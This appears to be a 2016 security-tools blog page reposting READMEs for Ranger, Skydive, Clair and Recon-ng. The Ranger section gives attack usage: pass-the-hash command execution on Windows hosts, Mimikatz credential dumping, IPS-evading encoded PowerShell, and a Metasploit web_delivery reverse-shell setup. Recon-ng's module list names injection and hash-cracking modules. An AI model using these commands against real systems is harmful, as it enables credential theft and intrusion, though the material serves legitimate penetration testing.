Translate

2016年4月18日星期一

Ranger - Tool To Access And Interact With Remote Microsoft Windows Based Systems


A tool to support security professionals access and interact with remote Microsoft Windows based systems. 
This project was conceptualized with the thought process, we did not invent the bow or the arrow, just a more efficient way of using it. 
Ranger is a command-line driven attack and penetration testing tool, which as the ability to use an instantiated catapult server to deliver capabilities against Windows Systems. As long as a user has a set of credentials or a hash set (NTLM, LM, LM:NTLM) he or she can gain access to systems that are apart of the trust. 
Using this capability a security professional can extract credentials out of memory in clear-text, access SAM tables, run commands, execute PowerShell scripts, Windows Binaries, and other tools. 
At this time the tool bypasses the majority of IPS vendor solutions unless they have been custom tuned to detect it. The tool was developed using our home labs in an effort to support security professionals doing legally and/or contractually supported activities. 
More functionality is being added, but at this time the tool uses the community contributions from repositories related to the PowerShell PowerView, PowerShell Mimikatz and Impacket teams.



Managing Ranger: 

Install: 
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Update: 
ranger --update

Usage: 
  • Ranger uses a combination of methods and attacks, a method is used to deliver an attack/command
  • An attack is what you are trying to accomplish
  • Some items are both a method and attack rolled into one and some methods cannot use some of the attacks due to current limitations in the libraries or protocols

Methods & Attacks: 
--scout
--secrets-dump

Method: 
--wmiexec
--psexec
--atexec

Attack: 
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Command Execution: 

Find Logged In Users: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

SMBEXEC Command Shell: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

PSEXEC Command Shell: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

PSEXEC Command Execution: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

WMIEXEC Command Execution: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

WMIEXEC PowerShell Mimikatz Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

WMIEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below): 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

WMIEXEC Custom Code Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe"

ATEXEC Command Execution: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

ATEXEC PowerShell Mimikatz Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

ATEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below): 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

ATEXEC Custom Code Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe" --no-encoder

SECRETSDUMP Custom Code Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

Create Pasteable Mimikatz Attack: 
ranger.py --invoker -q -v -vv -vvv

Create Pasteable web_delivery Attack (requires Metasploit config see below): 
ranger.py --downloader -q -v -vv -vvv

Create Pasteable Executor Attack: 
ranger.py --executor -q -v -vv -vvv

Identifying Groups Members and Domains 
  • When identifying groups make sure to determine what the actual query domain is with the --get-domain-membership
  • Then when you query a group use the optional --domain , which allows you to target a different domain than the one you logged into
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

Notes About Usage: 

Cred File Format: 
  • You can pass it a list of usernames and passwords or hashes in the following format in the same file:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

Credential File Caveats: 
  • If you provide domain names in the file they will be used instead of the default WORKGROUP. 
  • If you supply the domain name by command line -d , it will infer that you want to ignore all the domain names in the file.

Command Line Execution: 
  • If you do not want to use the file you can pass the details through command line directly.
  • If you wish to supply hashes instead of passwords just pass them through the password argument. 
  • If they are PWDUMP format and you supply no username it will pull the username out of the hash. 
  • If you supply a username it will think that the same hash applies to a different user.
  • Use the following formats for password:
password
LM:NTLM
:NTLM
PWDUMP

Targets and Target Lists: 
  • You can provide a list of targets either by using a target list or through the target option. 
  • You can supply multiple target list files by comma separating them and it will aggregate the data and remove duplicates and then exclude your IP address from the default interface or the interface you provide.
  • The tool accepts, CIDR notations, small ranges (192.168.195.1-100) or large ranges (192.168.194.1-192.163.1.1) or single IP addresses. 
  • Again just comma separating them by command line or put them in a new line delimited file.

Exclusions and Exclusion Lists: 
  • You can exclude targets using the exclude arguments as well, so if you do not touch a little Class C out of a Class A it will figure that out for you.

Intrusion Protection Systems (IPS): 
  • Mimikatz, Downloader and Executor use PowerShell memory injection by calling other services and protocols.
  • The commands are double encoded and bypass current IPS solutions (even next-gen) unless specifically tuned to catch these attacks. 
  • ATEXEC is the only one that currently lands on disk and does not encode, I still have some rewriting to do still.

Web_delivery attacks: 
  • To setup Metasploit for the web_delivery exploit start-up Metasploit and configure the exploit to meet the following conditions.
use exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j

FAQ 

Access Deined Errors for SMBEXEC and WMIEXEC 
I'm getting access denied errors in Windows machines that are part of a WORKGROUP. 
When not part of a domain, Windows by default does not have any administrative shares. SMBEXEC relies on shares being enabled. Additionally, WMIC isn't enabled on WORKGROUP machines. SMBEXEC and WMIEXEC are made to target protocols enabled on domain systems. While its certainly possible to enable these functions on a WORKGROUP system, note that you are introducing vulnerable protocols (after all, that's what this tool is made to attack). Enabling these features on your primary home system that your significant other uses for Facebook as well is probably not the best idea. 
  • Make sure this is a test box you own. You can force the shares to be enabled by following the instructions here: http://www.wintips.org/how-to-enable-admin-shares-windows-7/
  • If you want to determine what shares are exposed and then target them, you can use a tool like enum4linuxand then use the --share share_name argument in ranger to try and execute SMBEXEC.

Future Features: 

Nmap: 
  • The nmap XML feed is still in DRAFT and it is not functioning yet.

Credential Parsing: 
  • Clean credential parsing is in development to dump to files.

Colored Output: 
  • Add colored output with https://pypi.python.org/pypi/colorama

Presented At: 
BSides Charm City 2016: April 23, 2016 

Distributions the tool is a part of: 
Black Arch Linux 


 

skydive — Open Source Real Time Network Analyzer


Hacking Tools146077556336195 (3)
41 Views | Published on April 18th, 2016

skydive — Open Source Real Time Network Analyzer


Open Source Real Time Network Topology and Protocols Analyzer

Skydive is an open source real-time network topology and protocols analyzer. It aims to provide a comprehensive way of understanding what is happening in the network infrastructure. Skydive agents collect topology informations and flows and forward them to a central agent for further analysis. All the informations a stored in an Elasticsearch database.  Skydive is SDN-agnostic but provides SDN drivers in order to enhance the topology and flows informations. Currently only the Neutron driver is provided but more drivers will come soon.

Topology Probes

Topology probes currently implemented:
  • OVSDB
  • NetLINK
  • NetNS
  • Ethtool

Flow Probes

Flow probes currently implemented:
  • sFlow


Skydive-architecture

Dependencies

  • Go >= 1.5
  • Elasticsearch >= 2.0

Install

Make sure you have a working Go environment. Then make sure you have Godep installed.
$ go get github.com/redhat-cip/skydive/cmd/skydive

Open Source Real Time Network Analyzer


Skydive relies on two main components:
  • skydive agent, has to be started on each node where the topology and flows informations will be captured
  • skydive analyzer, the node collecting data captured by the agents

Configuration

For a single node setup, the configuration file is optional. For a multiple node setup, the analyzer IP/PORT need to be adapted. Processes are bound to 127.0.0.1 by default, you can explicitly change binding address with “listen: 0.0.0.0:port” in the proper configuration sections.  See the full list of configuration parameters in the sample configuration file etc/skydive.yml.default.

Start

$ skydive agent [--conf etc/skydive.yml]
$ skydive analyzer [--conf etc/skydive.yml]

WebUI

To access to the WebUI of agents or analyzer:
http://<address>:<port>


Skydive client

Skydive client can be used to interact with Skydive Analyzer and Agents. Running it without any command will return all the commands available.
$ skydive client

Usage:
  skydive client [command]

Available Commands:
  alert       Manage alerts
  capture     Manage captures

Flags:
  -h, --help[=false]: help for client
      --password="": password auth parameter
      --username="": username auth parameter
Specifying the subcommand will give the usage of the subcommand.
$ skydive client capture
If an authentication mechanism is defined in the configuration file the username and password parameter have to be used for each command. Environment variables SKYDIVE_USERNAME and SKYDIVE_PASSWORD can be used as default value for the username/password command line parameters.Start Flow captures


Start Flow captures

Skydive client allows you to start flow captures on topology Nodes/Interfaces
$ skydive client capture create -p <probe path>
The probe path parameter references the interfaces where the flow probe will be started, so where the capture will be done. The format of a probe path follows the links between topology nodes from a host node to a target node :
host1[Type=host]/.../node_nameN[Type=node_typeN]
The node name can be the name of :
  • a host
  • an interface
  • a namespace
The node types can be :
  • host
  • netns
  • ovsbridge
Currently target node types supported are :
  • ovsbridge
  • veth
  • device
  • internal
  • tun
  • bridge
To start a capture on the OVS bridge br1 on the host host1 the following probe path is used :
$ skydive client capture create -p "host1[Type=host]/br1[Type=ovsbridge]""
A wilcard for the host node can be used in order to start a capture on all hosts.
$ skydive client capture create -p "*/br1[Type=ovsbridge]"
A capture can be defined in advance and will start when a topology node will match.
To delete a capture :
$ skydive client capture delete <probe path>

API

Topology informations are accessible through HTTP or a WebSocket API
HTTP endpoint:
curl http://<address>:<port>/api/topology
WebSocket endpoint:
ws://<address>:<port>/ws/graph
Messages:
  • NodeUpdated
  • NodeAdded
  • NodeDeleted
  • EdgeUpdated
  • EdgeAdded
  • EdgeDeleted

Source && Download

https://github.com/redhat-cip/skydive

clair — Vulnerability Static Analysis for Containers

clair — Vulnerability Static Analysis for Containers

Clair is an open source project for the static analysis of
vulnerabilities in appc and docker containers


Vulnerability data is continuously imported from a known set of sources and correlated with the indexed contents of container images in order to produce lists of vulnerabilities that threaten a container. When vulnerability data changes upstream, the previous state and new state of the vulnerability along with the images they affect can be sent via webhook to a configured endpoint. All major components can be customized programmatically at compile-time without forking the project.
Clair goal is to enable a more transparent view of the security of container-based infrastructure. Thus, the project was named Clair after the French term which translates to clearbrighttransparent.
Clair

Common Use Cases



Manual Auditing

You’re building an application and want to depend on a third-party container image that you found by searching the internet. To make sure that you do not knowingly introduce a new vulnerability into your production service, you decide to scan the container for vulnerabilities. You docker pull the container to your development machine and start an instance of Clair. Once it finishes updating, you use the local image analysis tool to analyze the container. You realize this container is vulnerable to many critical CVEs, so you decide to use another one.

Container Registry Integration

Your company has a continuous-integration pipeline and you want to stop deployments if they introduce a dangerous vulnerability. A developer merges some code into the master branch of your codebase. The first step of your continuous-integration pipeline automates the testing and building of your container and pushes a new container to your container registry. Your container registry notifies Clair which causes the download and indexing of the images for the new container. Clair detects some vulnerabilities and sends a webhook to your continuous deployment tool to prevent this vulnerable build from seeing the light of day.


Vulnerability Static Analysis for Containers

During the first run, Clair will bootstrap its database with vulnerability data from its data sources. It can take several minutes before the database has been fully populated.
NOTE: These setups are not meant for production workloads, but as a quick way to get started.

Docker Compose

An easy way to get an instance of Clair running is to use Docker Compose to run everything locally. This runs a PostgreSQL database insecurely and locally in a container. This method should only be used for testing.
$ curl -L https://raw.githubusercontent.com/coreos/clair/master/docker-compose.yml -o $HOME/docker-compose.yml
$ mkdir $HOME/clair_config
$ curl -L https://raw.githubusercontent.com/coreos/clair/master/config.example.yaml -o $HOME/clair_config/config.yaml
$ $EDITOR $HOME/clair_config/config.yaml # Edit database source to be postgresql://postgres:password@postgres:5432?sslmode=disable
$ docker-compose -f $HOME/docker-compose.yml up -d
Docker Compose may start Clair before Postgres which will raise an error. If this error is raised, manually execute docker start clair_clair.

Docker

This method assumes you already have a PostgreSQL 9.4+ database running. This is the recommended method for production deployments.
$ mkdir $HOME/clair_config
$ curl -L https://raw.githubusercontent.com/coreos/clair/master/config.example.yaml -o $HOME/clair_config/config.yaml
$ $EDITOR $HOME/clair_config/config.yaml # Add the URI for your postgres database
$ docker run -d -p 6060-6061:6060-6061 -v $HOME/clair_config:/config quay.io/coreos/clair -config=/config/config.yaml

Source

To build Clair, you need to latest stable version of Go and a working Go environment. In addition, Clair requires that bzr, rpm, and xz be available on the system $PATH.
$ go get github.com/coreos/clair
$ go install github.com/coreos/clair/cmd/clair
$ $EDITOR config.yaml # Add the URI for your postgres database
$ ./$GOBIN/clair -config=config.yaml

Vulnerability Static Analysis for Containers: clair Documentation

Architecture

Vulnerability Static Analysis for Containers: clair diagram

Terminology

  • Image – a tarball of the contents of a container
  • Layer – an appc or Docker image that may or maybe not be dependent on another image
  • Detector – a Go package that identifies the content, namespaces and features from a layer
  • Namespace – a context around features and vulnerabilities (e.g. an operating system)
  • Feature – anything that when present could be an indication of a vulnerability (e.g. the presence of a file or an installed software package)
  • Fetcher – a Go package that tracks an upstream vulnerability database and imports them into Clair

Vulnerability Analysis

There are two major ways to perform analysis of programs: Static Analysis and Dynamic Analysis. Clair has been designed to perform static analysis; containers never need to be executed. Rather, the filesystem of the container image is inspected and features are indexed into a database. By indexing the features of an image into the database, images only need to be rescanned when new detectors are added.

Default Data Sources

Data SourceVersionsFormat
Debian Security Bug Tracker6, 7, 8, unstabledpkg
Ubuntu CVE Tracker12.04, 12.10, 13.04, 14.04, 14.10, 15.04, 15.10, 16.04dpkg
Red Hat Security Data5, 6, 7rpm

Customization

The major components of Clair are all programmatically extensible in the same way Go’s standard database/sql package is extensible.
Custom behavior can be accomplished by creating a package that contains a type that implements an interface declared in Clair and registering that interface in init(). To expose the new behavior, unqualified imports to the package must be added in your main.go, which should then start Clair usingBoot(*config.Config).
The following interfaces can have custom implementations registered via init() at compile time:
  • Datastore – the backing storage
  • Notifier – the means by which endpoints are notified of vulnerability changes
  • Fetcher – the sources of vulnerability data that is automatically imported
  • MetadataFetcher – the sources of vulnerability metadata that is automatically added to known vulnerabilities
  • DataDetector – the means by which contents of an image are detected
  • FeatureDetector – the means by which features are identified from a layer
  • NamespaceDetector – the means by which a namespace is identified from a layer

Source && Download


https://github.com/coreos/clair

Recon-ng – Web Reconnaissance Framework

Recon-ng is a full-featured Web Reconnaissance Framework written in Python. Complete with independent modules, database interaction, interactive help, and command completion – Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng - Web Reconnaissance Framework
Recon-ng has a look and feel and even command flow similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. It is of course quite different though, Recon-ng is not designed to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance.
If you want to exploit, use the Metasploit Framework. If you want to social engineer, use theSocial-Engineer Toolkit. If you want to conduct passive reconnaissance, use Recon-ng!

An example on active reconnaissance would be Skipfish by the Google Security Team.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the “module” class. The “module” class is a customized “cmd” interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes.

Modules

Recon-ng comes with ~80 recon moduloes, 2 discovery modules, 2 exploitation modules, 7 reporting modules and 2 import modules.
  • cache_snoop – DNS Cache Snooper
  • interesting_files – Interesting File Finder
  • command_injector – Remote Command Injection Shell Interface
  • xpath_bruter – Xpath Injection Brute Forcer
  • csv_file – Advanced CSV File Importer
  • list – List File Importer
  • point_usage – Jigsaw – Point Usage Statistics Fetcher
  • purchase_contact – Jigsaw – Single Contact Retriever
  • search_contacts – Jigsaw Contact Enumerator
  • jigsaw_auth – Jigsaw Authenticated Contact Enumerator
  • linkedin_auth – LinkedIn Authenticated Contact Enumerator
  • github_miner – Github Resource Miner
  • whois_miner – Whois Data Miner
  • bing_linkedin – Bing Linkedin Profile Harvester
  • email_validator – SalesMaple Email Validator
  • mailtester – MailTester Email Validator
  • mangle – Contact Name Mangler
  • unmangle – Contact Name Unmangler
  • hibp_breach – Have I been pwned? Breach Search
  • hibp_paste – Have I been pwned? Paste Search
  • pwnedlist – PwnedList Validator
  • migrate_contacts – Contacts to Domains Data Migrator
  • facebook_directory – Facebook Directory Crawler
  • fullcontact – FullContact Contact Enumerator
  • adobe – Adobe Hash Cracker
  • bozocrack – PyBozoCrack Hash Lookup
  • hashes_org – Hashes.org Hash Lookup
  • leakdb – leakdb Hash Lookup
  • metacrawler – Meta Data Extractor
  • pgp_search – PGP Key Owner Lookup
  • salesmaple – SalesMaple Contact Harvester
  • whois_pocs – Whois POC Harvester
  • account_creds – PwnedList – Account Credentials Fetcher
  • api_usage – PwnedList – API Usage Statistics Fetcher
  • domain_creds – PwnedList – Pwned Domain Credentials Fetcher
  • domain_ispwned – PwnedList – Pwned Domain Statistics Fetcher
  • leak_lookup – PwnedList – Leak Details Fetcher
  • leaks_dump – PwnedList – Leak Details Fetcher
  • brute_suffix – DNS Public Suffix Brute Forcer
  • baidu_site – Baidu Hostname Enumerator
  • bing_domain_api – Bing API Hostname Enumerator
  • bing_domain_web – Bing Hostname Enumerator
  • brute_hosts – DNS Hostname Brute Forcer
  • builtwith – BuiltWith Enumerator
  • google_site_api – Google CSE Hostname Enumerator
  • google_site_web – Google Hostname Enumerator
  • netcraft – Netcraft Hostname Enumerator
  • shodan_hostname – Shodan Hostname Enumerator
  • ssl_san – SSL SAN Lookup
  • vpnhunter – VPNHunter Lookup
  • yahoo_domain – Yahoo Hostname Enumerator
  • zone_transfer – DNS Zone File Harvester
  • ghdb – Google Hacking Database
  • punkspider – PunkSPIDER Vulnerabilty Finder
  • xssed – XSSed Domain Lookup
  • xssposed – XSSposed Domain Lookup
  • migrate_hosts – Hosts to Domains Data Migrator
  • bing_ip – Bing API IP Neighbor Enumerator
  • freegeoip – FreeGeoIP
  • ip_neighbor – My-IP-Neighbors.com Lookup
  • ipinfodb – IPInfoDB GeoIP
  • resolve – Hostname Resolver
  • reverse_resolve – Reverse Resolver
  • ssltools – SSLTools.com Host Name Lookups
  • geocode – Address Geocoder
  • reverse_geocode – Reverse Geocoder
  • flickr – Flickr Geolocation Search
  • instagram – Instagram Geolocation Search
  • picasa – Picasa Geolocation Search
  • shodan – Shodan Geolocation Search
  • twitter – Twitter Geolocation Search
  • whois_orgs – Whois Company Harvester
  • reverse_resolve – Reverse Resolver
  • shodan_net – Shodan Network Enumerator
  • census_2012 – Internet Census 2012 Lookup
  • sonar_cio – Project Sonar Lookup
  • migrate_ports – Ports to Hosts Data Migrator
  • dev_diver – Dev Diver Repository Activity Examiner
  • linkedin – Linkedin Contact Crawler
  • linkedin_crawl – Linkedin Profile Crawler
  • namechk – NameChk.com Username Validator
  • profiler – OSINT HUMINT Profile Collector
  • twitter – Twitter Handles
  • github_repos – Github Code Enumerator
  • gists_search – Github Gist Searcher
  • github_dorks – Github Dork Analyzer
  • csv – CSV File Creator
  • html – HTML Report Generator
  • json – JSON Report Generator
  • list – List Creator
  • pushpin – PushPin Report Generator
  • xlsx – XLSX File Creator
  • xml – XML Report Generator

Dependencies

All 3rd party libraries/packages should be installed prior to use. The framework checks for the presence of the following dependencies at runtime and disables the modules affected by missing dependencies.
You can download Recon-ng here:
To install:
Change into the Recon-ng directory.
Install dependencies.